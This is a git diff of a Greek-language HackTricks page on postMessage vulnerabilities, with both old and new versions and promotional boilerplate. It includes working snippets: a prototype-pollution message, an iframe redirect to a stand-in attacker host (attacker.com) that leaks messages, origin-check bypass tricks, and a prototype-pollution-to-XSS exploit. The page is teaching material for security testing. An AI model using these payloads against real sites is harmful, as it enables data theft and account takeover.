* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,24 +1,38 @@
|
|||
# Ευπάθειες PostMessage
|
||||
# Ευπαθείς Στοιχεία PostMessage
|
||||
|
||||
## Ευπάθειες PostMessage
|
||||
## Ευπαθείς Στοιχεία PostMessage
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΠΑΚΕΤΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Αποστολή **PostMessage**
|
||||
|
||||
Το **PostMessage** χρησιμοποιεί την παρακάτω συνάρτηση για να στείλει ένα μήνυμα:
|
||||
Το **PostMessage** χρησιμοποιεί την ακόλουθη λειτουργία για να στείλει ένα μήνυμα:
|
||||
```bash
|
||||
targetWindow.postMessage(message, targetOrigin, [transfer]);
|
||||
|
||||
|
@ -44,14 +58,14 @@ win = open('URL-with-iframe-inside', 'hack', 'width=800,height=300,top=500');
|
|||
## loop until win.length == 1 (until the iframe is loaded)
|
||||
win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
|
||||
```
|
||||
Σημειώστε ότι το **targetOrigin** μπορεί να είναι ένα '\*' ή ένα URL όπως _https://company.com._\
|
||||
Σημειώστε ότι το **targetOrigin** μπορεί να είναι ένα '\*' ή ένα URL όπως το _https://company.com._\
|
||||
Στο **δεύτερο σενάριο**, το **μήνυμα μπορεί να σταλεί μόνο σε αυτό τον τομέα** (ακόμη κι αν η προέλευση του αντικειμένου παραθύρου είναι διαφορετική).\
|
||||
Εάν χρησιμοποιηθεί το **wildcard**, τα **μηνύματα μπορούν να σταλούν σε οποιονδήποτε τομέα**, και θα σταλούν στην προέλευση του αντικειμένου παραθύρου.
|
||||
|
||||
### Επίθεση στο iframe & wildcard στο **targetOrigin**
|
||||
### Επίθεση σε iframe & wildcard στο **targetOrigin**
|
||||
|
||||
Όπως εξηγείται σε [**αυτήν την αναφορά**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/), εάν βρείτε μια σελίδα που μπορεί να γίνει **ενσωμάτωση** (χωρίς προστασία `X-Frame-Header`) και αυτή αποστέλλει ευαίσθητο μήνυμα μέσω **postMessage** χρησιμοποιώντας ένα **wildcard** (\*), μπορείτε να **τροποποιήσετε** την **προέλευση** του **iframe** και να **διαρρεύσετε** το **ευαίσθητο** μήνυμα σε έναν τομέα που ελέγχετε εσείς.\
|
||||
Σημειώστε ότι εάν η σελίδα μπορεί να ενσωματωθεί αλλά το **targetOrigin** είναι **ορισμένο σε ένα URL και όχι σε ένα wildcard**, αυτό το **κόλπο δεν θα λειτουργήσει**.
|
||||
Όπως εξηγείται σε [**αυτήν την αναφορά**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/), αν βρείτε μια σελίδα που μπορεί να **ενσωματωθεί μέσω iframe** (χωρίς προστασία `X-Frame-Header`) και αποστέλλει ευαίσθητο μήνυμα μέσω **postMessage** χρησιμοποιώντας ένα **wildcard** (\*), μπορείτε να **τροποποιήσετε** την **προέλευση** του **iframe** και να **διαρρεύσετε** το **ευαίσθητο** μήνυμα σε έναν τομέα που ελέγχετε εσείς.\
|
||||
Σημειώστε ότι αν η σελίδα μπορεί να ενσωματωθεί μέσω iframe αλλά το **targetOrigin** είναι **ορισμένο σε ένα URL και όχι σε ένα wildcard**, αυτό το **κόλπο δεν θα λειτουργήσει**.
|
||||
```markup
|
||||
<html>
|
||||
<iframe src="https://docs.google.com/document/ID" />
|
||||
|
@ -66,9 +80,9 @@ window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
|
|||
}
|
||||
</script>
|
||||
```
|
||||
## Εκμετάλλευση της συνάρτησης addEventListener
|
||||
## Εκμετάλλευση της addEventListener
|
||||
|
||||
Η συνάρτηση **`addEventListener`** χρησιμοποιείται από την JS για να δηλώσει τη συνάρτηση που αναμένει **`postMessages`**.\
|
||||
Η **`addEventListener`** είναι η συνάρτηση που χρησιμοποιείται από το JS για να δηλώσει τη συνάρτηση που **περιμένει `postMessages`**.\
|
||||
Θα χρησιμοποιηθεί ένας κώδικας παρόμοιος με τον παρακάτω:
|
||||
```javascript
|
||||
window.addEventListener("message", (event) => {
|
||||
|
@ -78,71 +92,81 @@ return;
|
|||
// ...
|
||||
}, false);
|
||||
```
|
||||
Σημειώστε σε αυτήν την περίπτωση πώς το **πρώτο πράγμα** που κάνει ο κώδικας είναι να **ελέγξει την προέλευση**. Αυτό είναι εξαιρετικά **σημαντικό** κυρίως αν η σελίδα πρόκειται να κάνει **οτιδήποτε ευαίσθητο** με τις ληφθείσες πληροφορίες (όπως αλλαγή κωδικού πρόσβασης). **Αν δεν ελέγχει την προέλευση, οι επιτιθέμενοι μπορούν να κάνουν τα θύματα να στείλουν αυθαίρετα δεδομένα σε αυτά τα σημεία** και να αλλάξουν τους κωδικούς πρόσβασης των θυμάτων (σε αυτό το παράδειγμα).
|
||||
Σημειώστε σε αυτήν την περίπτωση πώς το **πρώτο πράγμα** που κάνει ο κώδικας είναι **έλεγχος της προέλευσης**. Αυτό είναι εξαιρετικά **σημαντικό** κυρίως αν η σελίδα πρόκειται να κάνει **οτιδήποτε ευαίσθητο** με τις ληφθείσες πληροφορίες (όπως αλλαγή κωδικού). **Αν δεν γίνεται έλεγχος της προέλευσης, οι επιτιθέμενοι μπορούν να κάνουν τα θύματα να στείλουν αυθαίρετα δεδομένα σε αυτά τα σημεία** και να αλλάξουν τους κωδικούς των θυμάτων (σε αυτό το παράδειγμα).
|
||||
|
||||
### Απαρίθμηση
|
||||
|
||||
Για να **βρείτε ακροατές γεγονότων** στην τρέχουσα σελίδα μπορείτε:
|
||||
Για να **βρείτε ακροατές συμβάντων** στην τρέχουσα σελίδα μπορείτε:
|
||||
|
||||
* **Αναζήτηση** του κώδικα JS για `window.addEventListener` και `$(window).on` (_έκδοση JQuery_)
|
||||
* **Εκτέλεση** στην κονσόλα των εργαλείων προγραμματιστή: `getEventListeners(window)`
|
||||
* **Αναζήτηση** του κώδικα JS για `window.addEventListener` και `$(window).on` (_JQuery έκδοση_)
|
||||
* **Εκτέλεση** στην κονσόλα εργαλείων προγραμματιστή: `getEventListeners(window)`
|
||||
|
||||
![](<../../.gitbook/assets/image (618) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (618) (1).png>)
|
||||
|
||||
* **Πηγαίνετε** σε _Στοιχεία --> Ακροατές Γεγονότων_ στα εργαλεία προγραμματιστή του προγράμματος περιήγησης
|
||||
* **Μετάβαση** σε _Στοιχεία --> Ακροατές Συμβάντων_ στα εργαλεία προγραμματιστή του προγράμματος περιήγησης
|
||||
|
||||
![](<../../.gitbook/assets/image (617).png>)
|
||||
![](<../../.gitbook/assets/image (393).png>)
|
||||
|
||||
* Χρησιμοποιήστε μια **επέκταση προγράμματος περιήγησης** όπως [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) ή [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker). Αυτές οι επεκτάσεις προγράμματος περιήγησης θα **παρακολουθούν όλα τα μηνύματα** και θα τα εμφανίζουν.
|
||||
|
||||
### Παράκαμψη ελέγχου προέλευσης
|
||||
|
||||
- Το χαρακτηριστικό **`event.isTrusted`** θεωρείται ασφαλές καθώς επιστρέφει `True` μόνο για γεγονότα που προκαλούνται από γνήσιες ενέργειες χρήστη. Αν και είναι προκλητικό να παρακαμφθεί αν υλοποιηθεί σωστά, η σημασία του στους ελέγχους ασφαλείας είναι σημαντική.
|
||||
|
||||
- Η χρήση της μεθόδου **`indexOf()`** για τον έλεγχο της προέλευσης στα γεγονότα PostMessage μπορεί να είναι ευάλωτη σε παράκαμψη. Ένα παράδειγμα που επεξηγεί αυτήν την ευπάθεια είναι:
|
||||
* Το χαρακτηριστικό **`event.isTrusted`** θεωρείται ασφαλές καθώς επιστρέφει `True` μόνο για συμβάντα που προέρχονται από γνήσιες ενέργειες χρήστη. Αν και είναι προκλητικό να παρακαμφθεί αν υλοποιηθεί σωστά, η σημασία του στους ελέγχους ασφαλείας είναι σημαντική.
|
||||
* Η χρήση της **`indexOf()`** για την επικύρωση προέλευσης σε συμβάντα PostMessage μπορεί να είναι ευάλωτη στην παράκαμψη. Ένα παράδειγμα που επιδεικνύει αυτήν την ευπάθεια είναι:
|
||||
|
||||
```javascript
|
||||
("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")
|
||||
```
|
||||
|
||||
- Η μέθοδος **`search()`** από το `String.prototype.search()` προορίζεται για τις κανονικές εκφράσεις, όχι για συμβολοσειρές. Η παράδοση οποιουδήποτε άλλου πράγματος εκτός από μια κανονική έκφραση οδηγεί σε αυτόματη μετατροπή σε κανονική έκφραση, καθιστώντας τη μέθοδο δυνητικά μη ασφαλή. Αυτό συμβαίνει επειδή στις κανονικές εκφράσεις, ένα τελεία (.) λειτουργεί ως μπαλαντέρ, επιτρέποντας την παράκαμψη του ελέγχου με ειδικά διαμορφωμένους τομείς. Για παράδειγμα:
|
||||
* Η μέθοδος **`search()`** από `String.prototype.search()` προορίζεται για τακτικές εκφράσεις, όχι για συμβολοσειρές. Η παράδοση οτιδήποτε διαφορετικό από μια τακτική οδηγεί σε αυτόματη μετατροπή σε τακτική, κάνοντας τη μέθοδο δυνητικά ανασφαλή. Αυτό συμβαίνει επειδή στις τακτικές εκφράσεις, ένα τελεία (.) λειτουργεί ως μπαλαντέρ, επιτρέποντας την παράκαμψη της επικύρωσης με ειδικά διαμορφωμένους τομείς. Για παράδειγμα:
|
||||
|
||||
```javascript
|
||||
"https://www.safedomain.com".search("www.s.fedomain.com")
|
||||
```
|
||||
* Η λειτουργία **`match()`**, παρόμοια με το `search()`, επεξεργάζεται τακτικές εκφράσεις. Αν η τακτική είναι κατασκευασμένη εσφαλμένα, ενδέχεται να είναι ευάλωτη στην παράκαμψη.
|
||||
* Η συνάρτηση **`escapeHtml`** προορίζεται για την αποσυμπίεση εισόδων με την απόδραση χαρακτήρων. Ωστόσο, δεν δημιουργεί ένα νέο αποδεδειγμένο αντικείμενο αλλά αντικαθιστά τις ιδιότητες του υπάρχοντος αντικειμένου. Αυτή η συμπεριφορά μπορεί να εκμεταλλευτεί. Ειδικότερα, αν ένα αντικείμενο μπορεί να διαχειριστεί έτσι ώστε η ελεγχόμενη ιδιότητά του να μην αναγνωρίζει το `hasOwnProperty`, το `escapeHtml` δεν θα λειτουργήσει όπως αναμένεται. Αυτό φαίνεται στα παρακάτω παραδείγματα:
|
||||
|
||||
- Η συνάρτηση **`match()`**, παρόμοια με την `search()`, επεξεργάζεται κανονικές εκφράσεις. Αν η κανονική έκφραση δεν έχει σωστή δομή, μπορεί να είναι ευάλωτη σε παράκαμψη.
|
||||
* Αναμενόμενη Αποτυχία:
|
||||
|
||||
- Η συνάρτηση **`escapeHtml`** προορίζεται για την απολύμανση των εισόδων με την απόδραση χαρακτήρων. Ωστόσο, δεν δημιουργεί ένα νέο αντικείμενο αποδρασμένων χαρακτήρων, αλλά αντικαθιστά τις ιδιότητες του υπάρχοντος αντικειμένου. Αυτή η συμπεριφορά μπορεί να εκμεταλλευτεί. Ειδικότερα, αν ένα αντικείμενο μπορεί να διαμορφωθεί έτσι ώστε η ελεγχόμενη ιδιότητά του να μην αναγνωρίζει την `hasOwnProperty`, το `escapeHtml` δεν θα λειτουργήσει όπως αναμένεται. Αυτό αποδεικνύεται στα παρακάτω παραδείγματα:
|
||||
|
||||
- Αναμενόμενη αποτυχία:
|
||||
```javascript
|
||||
result = u({
|
||||
message: "'\"<b>\\"
|
||||
});
|
||||
result.message // "'"<b>\"
|
||||
```
|
||||
* Παράκαμψη της απόδρασης:
|
||||
|
||||
- Παράκαμψη της απόδρασης:
|
||||
```javascript
|
||||
result = u(new Error("'\"<b>\\"));
|
||||
result.message; // "'"<b>\"
|
||||
```
|
||||
|
||||
Στο πλαίσιο αυτής της ευπάθειας, το αντικείμενο `File` είναι ιδιαίτερα εκμεταλλεύσιμο λόγω της ιδιότητας `name` που είναι μόνο για ανάγνωση. Αυτή η ιδιότητα, όταν χρησιμοποιείται σε πρότυπα, δεν απολυμαίνεται από τη συνάρτηση `escapeHtml`, με αποτέλεσμα δυνητικούς κινδύνους ασφάλειας.
|
||||
|
||||
- Η ιδιότητα `document.domain` στην JavaScript μπορεί να οριστεί από ένα σενάριο για να μειωθεί το μήκος του τομέα, επιτρέποντας μια πιο χαλαρή εφαρμογή της πολιτικής ίδιας προέλευσης εντός του ίδιου γονικού τομέα.
|
||||
Στο πλαίσιο αυτής της ευπάθειας, το αντικείμενο `File` είναι εύκολα εκμεταλλεύσιμο λόγω της ιδιότητάς του `name` που είναι μόνο για ανάγνωση. Αυτή η ιδιότητα, όταν χρησιμοποιείται σε πρότυπα, δεν αποσυμπιέζεται από τη συνάρτηση `escapeHtml`, οδηγώντας σε πιθανούς κινδύνους ασφάλειας.
|
||||
* Η ιδιότητα `document.domain` στην JavaScript μπορεί να οριστεί από ένα σενάριο για τη σύντμηση του τομέα, επιτρέποντας μια πιο χαλαρή εφαρμογή της πολιτικής ίδιας προέλευσης εντός του ίδιου γονικού τομέα.
|
||||
|
||||
### Παράκαμψη e.origin == window.origin
|
||||
|
||||
Όταν ενσωματώνετε μια ιστοσελίδα μέσα σε ένα **sandboxed iframe** χρησιμοπ
|
||||
Κατά την ενσωμάτωση μιας ιστοσελίδας μέσα σε ένα **iframe με αμμόλιθο** χρησιμοποιώντας %%%%%%, είναι κρίσιμο να κατανοήσετε ότι η προέλευση του iframe θα οριστεί σε null. Αυτό είναι ιδιαίτερα σημαντικό όταν ασχολείστε με τα **χαρακτηριστικά αμμόλιθου** και τις επιπτώσεις τους στην ασφάλεια και τη λειτουργικότητα.
|
||||
|
||||
Με την καθορισμό του **`allow-popups`** στο χαρακτηριστικό του αμμόλιθου, οποιοδήποτε αναδυόμενο παράθυρο που ανοίγεται από το εσωτερικό του iframe κληρονομεί τους περιορισμούς του αμμόλιθου γονέα του. Αυτό σημαίνει ότι εκτός αν περιλαμβάνεται επίσης το χαρακτηριστικό **`allow-popups-to-escape-sandbox`**, η προέλευση του αναδυόμενου παραθύρου ορίζεται επίσης σε `null`, ευθυγραμμίζοντας με την προέλευση του iframe.
|
||||
|
||||
Ως εκ τούτου, όταν ανοίγεται ένα αναδυόμενο παράθυρο υπό αυτές τις συνθήκες και αποστέλλεται ένα μήνυμα από το iframe στο αναδυόμενο παράθυρο χρησιμοποιώντας το **`postMessage`**, τόσο η αποστολή όσο και η λήψη έχουν τις προελεύσεις τους ορισμένες σε `null`. Αυτή η κατάσταση οδηγεί σε μια περίπτωση όπου **`e.origin == window.origin`** αξιολογείται ως αληθής (`null == null`), επειδή τόσο το iframe όσο και το αναδυόμενο παράθυρο μοιράζονται την ίδια τιμή προέλευσης του `null`.
|
||||
|
||||
Για περισσότερες πληροφορίες **διαβάστε**:
|
||||
|
||||
{% content-ref url="bypassing-sop-with-iframes-1.md" %}
|
||||
[bypassing-sop-with-iframes-1.md](bypassing-sop-with-iframes-1.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Παράκαμψη e.source
|
||||
|
||||
Είναι δυνατό να ελεγχθεί αν το μήνυμα προήλθε από το ίδιο παράθυρο στο οποίο ο κώδικας ακούει (ιδιαίτερα ενδιαφέρον για **Σενάρια Περιεχομένου από επεκτάσεις προγραμμάτων περιήγησης** για να ελέγξουν αν το μήνυμα στάλθηκε από την ίδια σελίδα):
|
||||
```javascript
|
||||
// If it’s not, return immediately.
|
||||
if( received_message.source !== window ) {
|
||||
return;
|
||||
}
|
||||
```
|
||||
Μπορείτε να αναγκάσετε το **`e.source`** ενός μηνύματος να είναι null δημιουργώντας ένα **iframe** που **στέλνει** το **postMessage** και αμέσως διαγράφεται.
|
||||
Μπορείτε να αναγκάσετε το **`e.source`** ενός μηνύματος να είναι null δημιουργώντας ένα **iframe** που **στέλνει** το **postMessage** και **διαγράφεται αμέσως**.
|
||||
|
||||
Για περισσότερες πληροφορίες **διαβάστε:**
|
||||
|
||||
|
@ -150,27 +174,27 @@ return;
|
|||
[bypassing-sop-with-iframes-2.md](bypassing-sop-with-iframes-2.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Παράκαμψη του X-Frame-Header
|
||||
### Παράκαμψη X-Frame-Header
|
||||
|
||||
Για να εκτελέσετε αυτές τις επιθέσεις ιδανικά θα πρέπει να μπορείτε να **τοποθετήσετε την ιστοσελίδα του θύματος** μέσα σε ένα `iframe`. Ωστόσο, ορισμένα headers όπως το `X-Frame-Header` μπορούν να **εμποδίσουν** αυτήν την **συμπεριφορά**.\
|
||||
Σε αυτά τα σενάρια, μπορείτε ακόμα να χρησιμοποιήσετε μια λιγότερο αόρατη επίθεση. Μπορείτε να ανοίξετε ένα νέο tab στην ευάλωτη web εφαρμογή και να επικοινωνήσετε μαζί της:
|
||||
Για να εκτελέσετε αυτές τις επιθέσεις ιδανικά θα πρέπει να **τοποθετήσετε την ιστοσελίδα θύματος** μέσα σε ένα `iframe`. Αλλά κάποια headers όπως το `X-Frame-Header` μπορεί να **εμποδίσουν** αυτή τη **συμπεριφορά**.\
|
||||
Σε αυτά τα σενάρια μπορείτε ακόμα να χρησιμοποιήσετε μια λιγότερο αθόρυβη επίθεση. Μπορείτε να ανοίξετε ένα νέο tab στην ευάλωτη εφαρμογή και να επικοινωνήσετε μαζί της:
|
||||
```markup
|
||||
<script>
|
||||
var w=window.open("<url>")
|
||||
setTimeout(function(){w.postMessage('text here','*');}, 2000);
|
||||
</script>
|
||||
```
|
||||
### Κλοπή μηνύματος που αποστέλλεται στο παιδί μπλοκάροντας την κύρια σελίδα
|
||||
### Κλοπή μηνύματος που στάλθηκε στο παιδί με τον φραγμό της κύριας σελίδας
|
||||
|
||||
Στην παρακάτω σελίδα μπορείτε να δείτε πώς μπορείτε να κλέψετε ευαίσθητα δεδομένα που αποστέλλονται μέσω **postmessage** σε ένα **παιδικό iframe** μπλοκάροντας την **κύρια** σελίδα πριν αποστείλετε τα δεδομένα και καταχραστείτε ένα **XSS στο παιδί** για να **διαρρεύσετε τα δεδομένα** πριν τα λάβει:
|
||||
Στην παρακάτω σελίδα μπορείτε να δείτε πως μπορείτε να κλέψετε ευαίσθητα δεδομένα που στάλθηκαν μέσω **postmessage** σε ένα **παιδικό iframe** με τον τρόπο του **φραγμού** της **κύριας** σελίδας πριν από την αποστολή των δεδομένων και εκμεταλλευόμενοι ένα **XSS στο παιδί** για να **διαρρεύσουν τα δεδομένα** πριν τα λάβει:
|
||||
|
||||
{% content-ref url="blocking-main-page-to-steal-postmessage.md" %}
|
||||
[blocking-main-page-to-steal-postmessage.md](blocking-main-page-to-steal-postmessage.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Κλοπή μηνύματος τροποποιώντας την τοποθεσία του iframe
|
||||
### Κλοπή μηνύματος με την τροποποίηση της τοποθεσίας του iframe
|
||||
|
||||
Εάν μπορείτε να ενσωματώσετε μια ιστοσελίδα χωρίς το κεφαλίδα X-Frame-Header που περιέχει ένα άλλο iframe, μπορείτε να **αλλάξετε την τοποθεσία αυτού του παιδικού iframe**, έτσι αν λαμβάνει ένα **postmessage** που αποστέλλεται χρησιμοποιώντας ένα **wildcard**, ένας επιτιθέμενος μπορεί να **αλλάξει** την **προέλευση** του iframe σε μια σελίδα που **ελέγχεται** από αυτόν και να **κλέψει** το μήνυμα:
|
||||
Αν μπορείτε να ενσωματώσετε μια ιστοσελίδα μέσω iframe χωρίς X-Frame-Header που περιέχει άλλο iframe, μπορείτε να **αλλάξετε την τοποθεσία του παιδικού iframe**, έτσι αν λαμβάνει ένα **postmessage** που στάλθηκε χρησιμοποιώντας ένα **wildcard**, ένας επιτιθέμενος μπορεί να **αλλάξει** την τοποθεσία του iframe αυτού σε μια σελίδα που **ελέγχεται** από αυτόν και να **κλέψει** το μήνυμα:
|
||||
|
||||
{% content-ref url="steal-postmessage-modifying-iframe-location.md" %}
|
||||
[steal-postmessage-modifying-iframe-location.md](steal-postmessage-modifying-iframe-location.md)
|
||||
|
@ -178,11 +202,11 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
|
|||
|
||||
### postMessage σε Prototype Pollution και/ή XSS
|
||||
|
||||
Σε περιπτώσεις όπου τα δεδομένα που αποστέλλονται μέσω `postMessage` εκτελούνται από τον JS, μπορείτε να **ενσωματώσετε** την **σελίδα** και να εκμεταλλευτείτε τη **διαρροή πρωτοτύπου/XSS** αποστέλλοντας την εκμετάλλευση μέσω `postMessage`.
|
||||
Σε περιπτώσεις όπου τα δεδομένα που στέλνονται μέσω `postMessage` εκτελούνται από JS, μπορείτε να **ενσωματώσετε** τη **σελίδα** και να **εκμεταλλευτείτε** τη **διαρροή πρωτοτύπου/XSS** στέλνοντας την εκμετάλλευση μέσω `postMessage`.
|
||||
|
||||
Μερικά παραδείγματα **πολύ καλά εξηγημένων XSS μέσω `postMessage`** μπορούν να βρεθούν στο [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)
|
||||
Μερικά **πολύ καλά εξηγημένα XSS μέσω `postMessage`** μπορούν να βρεθούν στο [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)
|
||||
|
||||
Παράδειγμα μιας εκμετάλλευσης για κατάχρηση της **διαρροής πρωτοτύπου και στη συνέχεια XSS** μέσω ενός `postMessage` σε ένα `iframe`:
|
||||
Παράδειγμα μιας εκμετάλλευσης για την κατάχρηση της **Διαρροής Πρωτοτύπου και στη συνέχεια XSS** μέσω ενός `postMessage` σε ένα `iframe`:
|
||||
```html
|
||||
<html>
|
||||
<body>
|
||||
|
@ -200,9 +224,9 @@ setTimeout(get_code, 2000);
|
|||
```
|
||||
Για **περισσότερες πληροφορίες**:
|
||||
|
||||
* Σύνδεσμος προς τη σελίδα για [**προσβολή πρωτοτύπου**](../deserialization/nodejs-proto-prototype-pollution/)
|
||||
* Σύνδεσμος προς τη σελίδα για [**XSS**](../xss-cross-site-scripting/)
|
||||
* Σύνδεσμος προς τη σελίδα για [**προσβολή πρωτοτύπου πελάτη προς XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
|
||||
* Σύνδεσμος στη σελίδα για το [**prototype pollution**](../deserialization/nodejs-proto-prototype-pollution/)
|
||||
* Σύνδεσμος στη σελίδα για το [**XSS**](../xss-cross-site-scripting/)
|
||||
* Σύνδεσμος στη σελίδα για το [**client side prototype pollution to XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
|
||||
|
||||
## Αναφορές
|
||||
|
||||
|
@ -210,16 +234,28 @@ setTimeout(get_code, 2000);
|
|||
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
|
||||
* Για πρακτική: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αρπαγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
